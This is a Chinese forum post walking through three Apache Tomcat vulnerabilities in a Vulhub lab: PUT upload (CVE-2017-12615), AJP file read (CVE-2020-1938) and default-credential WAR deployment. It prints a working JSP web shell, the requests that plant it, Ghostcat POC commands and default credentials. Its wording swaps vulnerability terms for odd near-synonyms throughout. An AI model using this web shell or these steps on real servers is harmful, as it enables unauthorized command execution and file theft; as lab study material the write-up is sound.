论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
朋友圈
看朋友圈动态,了解ToB世界。
ToB门户
了解全球最新的ToB事件
博客
Blog
排行榜
Ranklist
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
导读
Guide
相册
Album
记录
Doing
搜索
本版
文章
帖子
ToB圈子
用户
免费入驻
产品入驻
解决方案入驻
公司入驻
案例入驻
登录
·
注册
只需一步,快速开始
账号登录
立即注册
找回密码
用户名
Email
自动登录
找回密码
密码
登录
立即注册
首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
圈子
SAAS
ToB企服应用市场:ToB评测及商务社交产业平台
»
论坛
›
安全
›
终端安全
›
中间件安全—Tomcat常见毛病
中间件安全—Tomcat常见毛病
东湖之滨
金牌会员
|
2024-8-25 22:39:47
|
显示全部楼层
|
阅读模式
楼主
主题
934
|
帖子
934
|
积分
2806
中间件安全—Tomcat常见毛病
1.Tomcat常见毛病
* 1.1.前言
复制代码
1.2.文件上传 (CVE-2017-12615)
* 1.2.1.漏洞原理
复制代码
1.2.2.影响版本
1.2.3.毛病复现
* 1.2.3.1.测试是否允许PUT
复制代码
1.2.3.2.验证毛病是否存在
1.2.3.3.访问test.jsp
1.2.3.4.上传执行下令脚本
1.2.3.5.执行下令
1.3.文件包罗毛病(CVE-2020-1938)
* 1.3.1.漏洞原理
复制代码
1.3.2.影响版本
1.3.3.毛病复现
* 1.3.3.1.访问页面
复制代码
1.3.3.2.POC下载
1.3.3.3.POC验证
1.4.弱口令&war长途摆设
* 1.4.1.漏洞原理
复制代码
1.4.2.影响版本
1.4.3.毛病复现
* 1.4.3.1.访问后台
复制代码
1.4.3.2.后台管理
1.4.3.3.进入模块
1.4.3.4.获取shell
1.Tomcat常见毛病
1.1.前言
整个复现环境均使用Vulhub一键搭建毛病测试靶场,Vulhub靶场:链接
1.2.文件上传 (CVE-2017-12615)
1.2.1.毛病原理
Tomcat配置文件/conf/web.xml
配置了可写(readonly=false),导致可以使用PUT方法上传恣意文件,攻击者将精心构造的payload向服务器上传包罗恣意代码的 JSP
文件。之后,JSP 文件中的代码将能被服务器执行。
1.2.2.影响版本
Apache Tomcat 7.0.0 – 7.0.81
1.2.3.毛病复现
1.2.3.1.测试是否允许PUT
这里修改请求方式为OPTIONS /xx HTTP/1.1,通过修改后发现允许PUT方法。
1.2.3.2.验证毛病是否存在
这里修改请求方式为:PUT /test.jsp/ HTTP/1.1,请求体为:<%out.print(“hacker”); %>,然后访问test.jsp。
1.2.3.3.访问test.jsp
URL:http:ip地址:端口/test.jsp
复制代码
1.2.3.4.上传执行下令脚本
修改请求头PUT /test.jsp/ HTTP/1.1,修改请求体。
请求体:
<%
if("123".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[1024];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
复制代码
1.2.3.5.执行下令
http://ip地址:8080/test.jsp?&pwd=123&cmd=ls
复制代码
1.3.文件包罗毛病(CVE-2020-1938)
1.3.1.毛病原理
Tomcat 配置了两个Connecto,它们分别是 HTTP 和 AJP
:HTTP默认端口为8080,处置惩罚http请求,而AJP默认端口8009,用于处置惩罚 AJP
协议的请求,而AJP比http更加优化,多用于反向、集群等,毛病由于Tomcat
AJP协议存在缺陷而导致,攻击者利用该毛病可通过构造特定参数,读取服务器webapp下的恣意文件以及可以包罗恣意文件,假如有某上传点,上传图片马等等,即可以获取shell。
1.3.2.影响版本
Apache Tomcat 6
Apache Tomcat 7 < 7.0.100
Apache Tomcat 8 < 8.5.51
Apache Tomcat 9 < 9.0.31
开启了8009端口的ajp服务
1.3.3.毛病复现
1.3.3.1.访问页面
访问http://your-ip:8080即可查看tomcat默认页面,此时通过AJP协议的8009端口亦可访问Tomcat。
1.3.3.2.POC下载
POC链接:链接
固然你也可以在kali中使用下令举行下载,检测等,不过我这里由于网络原因不停下载不下来,我就用本机下载再上传虚拟机了。
命令:
git clone https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
cd CNVD-2020-10487-Tomcat-Ajp-lfi
python CNVD-2020-10487-Tomcat-Ajp-lfi.py #py2环境
复制代码
1.3.3.3.POC验证
这里查看8009端口下的web.xml文件
命令:python2 CNVD-2020-10487-Tomcat-Ajp-lfi.py IP地址 -p 8009 -f /WEB-INF/web.xml
复制代码
1.4.弱口令&war长途摆设
1.4.1.毛病原理
在tomcat8环境下默认进入后台的密码为tomcat/tomcat,未修改造成未授权即可进入后台。
1.4.2.影响版本
全版本
1.4.3.毛病复现
1.4.3.1.访问后台
这里首先需要先访问后台管理。
http://ip地址:8080/manager/html
复制代码
1.4.3.2.后台管理
在后台有一个上传war包的地方,这里就是我们用来上传木马的地方,这里我没预备jsp马,我使用msf来举行操纵吧。
1.4.3.3.进入模块
进入msf里面的exploit/multi/http/tomcat_mgr_upload模块。
1.4.3.4.获取shell
我这边由于使用云服务器,存在反弹的端口不通,大概被拦截了,以是就没有反弹回来。
如何入门网络安全
发起
多看书
阅读永远是最有效的方法,只管册本并不肯定是最好的入门方式,但册本的明白需要肯定的基础;但是就目前来看,册本是比力靠谱的入门资料。
现在Web安全册本比力多,因此大家在学习的过程中可以少走了不少的弯路。假如以上保举册本阅读有困难,那就找自己能看得进的 Web 安全的书
固然纸上谈兵终觉浅,最好还是实践一下。
对于那些没有学习方向和资料的同学,可以看下我整理的资源,这份资料经历过社会的实践,可以说是当下全网较全的网络安全知识体系:
①网络安全学习门路
②20份渗出测试电子书
③安全攻防357页条记
④50份安全攻防面试指南
⑤安全红队渗出工具包
⑥网络安全必备册本
⑦100个毛病实战案例
⑧安全大厂内部视频资源
⑨积年CTF夺旗赛题解析
假如你对网络安全入门感兴趣,那么你点击这里
本帖子中包含更多资源
您需要
登录
才可以下载或查看,没有账号?
立即注册
x
回复
使用道具
举报
0 个回复
倒序浏览
返回列表
快速回复
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
or
立即注册
本版积分规则
发表回复
回帖并转播
回帖后跳转到最后一页
发新帖
回复
东湖之滨
金牌会员
这个人很懒什么都没写!
楼主热帖
《HarmonyOS开发 - 小凌派-RK2206开发 ...
VMware虚拟机安装黑群晖7.1
从0到1实现一套CICD流程之CD
当我们在聊「开源大数据调度系统Taier ...
ABP Framework 7.0 RC 新增功能简介 ...
MySQL视图
大二C#实现酒店管理系统(C端展示、前 ...
MySQL8.0 优化器介绍(二)
[ARM 汇编]高级部分—ARM汇编编程实战 ...
dotnet 6 为什么网络请求不跟随系统网 ...
标签云
挺好的
服务器
浏览过的版块
人工智能
快速回复
返回顶部
返回列表